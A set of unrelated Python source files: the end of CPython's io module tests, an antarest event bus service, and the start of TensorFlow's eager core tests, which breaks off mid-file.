def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
self.assertEqual(t.read(), u'a')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri_codec")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri_codec")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
#else:
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read, 1)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.readline)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read)
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
class PyMiscIOTest(MiscIOTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still consider that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.gollect() seems to be enough to
# work around all these issues.
support.gc_collect()
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
try:
with self.assertRaises(ZeroDivisionError):
wio.write(item * (support.PIPE_MAX_SIZE // len(item) + 1))
finally:
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupterd_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupterd_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = [None]
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
error[0] = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error[0])
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupterd_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupterd_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
service.py
|
import asyncio
import logging
import threading
import time
from typing import List, Callable, Optional, Dict, Awaitable
from uuid import uuid4
from antarest.core.interfaces.eventbus import Event, IEventBus
from antarest.eventbus.business.interfaces import IEventBusBackend
logger = logging.getLogger(__name__)
class EventBusService(IEventBus):
def __init__(
self, backend: IEventBusBackend, autostart: bool = True
) -> None:
self.backend = backend
self.listeners: Dict[str, Callable[[Event], Awaitable[None]]] = {}
self.lock = threading.Lock()
if autostart:
self.start()
def push(self, event: Event) -> None:
# TODO add arg permissions with group/role, user, public
self.backend.push_event(event)
def add_listener(
self,
listener: Callable[[Event], Awaitable[None]],
type_filter: Optional[List[str]] = None,
) -> str:
with self.lock:
listener_id = str(uuid4())
self.listeners[listener_id] = listener
return listener_id
def remove_listener(self, listener_id: str) -> None:
with self.lock:
del self.listeners[listener_id]
async def _run_loop(self) -> None:
while True:
time.sleep(0.2)
await self._on_events()
async def _on_events(self) -> None:
with self.lock:
for e in self.backend.get_events():
for listener in self.listeners.values():
try:
await listener(e)
except Exception as ex:
logger.error(
f"Failed to process event {e.type}", exc_info=ex
)
self.backend.clear_events()
def _async_loop(self, new_loop: bool = True) -> None:
loop = (
asyncio.new_event_loop() if new_loop else asyncio.get_event_loop()
)
loop.run_until_complete(self._run_loop())
def start(self, threaded: bool = True) -> None:
if threaded:
t = threading.Thread(target=self._async_loop)
t.setDaemon(True)
logger.info("Starting event bus")
t.start()
else:
self._async_loop(new_loop=False)
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
class TFETest(test_util.TensorFlowTestCase):
def testContext(self):
ctx = context.Context()
self.assertFalse(ctx.in_graph_mode())
self.assertTrue(ctx.in_eager_mode())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertIsNone(ctx.summary_writer_resource)
ctx.summary_writer_resource = 'mock'
self.assertEqual('mock', ctx.summary_writer_resource)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.in_graph_mode(),
ctx.in_eager_mode(), ctx.scope_name, ctx.summary_writer_resource,
ctx.device_name, ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
def testContextConfig(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant(1.).as_gpu_tensor()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].as_cpu_tensor().numpy()
self.assertEqual(3, result)
def testCopyBetweenDevices(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.as_cpu_tensor()
x = x.as_gpu_tensor()
x = x.as_gpu_tensor()
x = x.as_cpu_tensor()
# Invalid device
with self.assertRaises(RuntimeError):
x.as_gpu_tensor(context.context().num_gpus() + 1)
def testNumpyForceCPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.as_gpu_tensor()
self.assertAllEqual(c2g.numpy(), cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.as_cpu_tensor()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta.numpy(), tb.numpy())
def testRegisterExceptionClass(self):
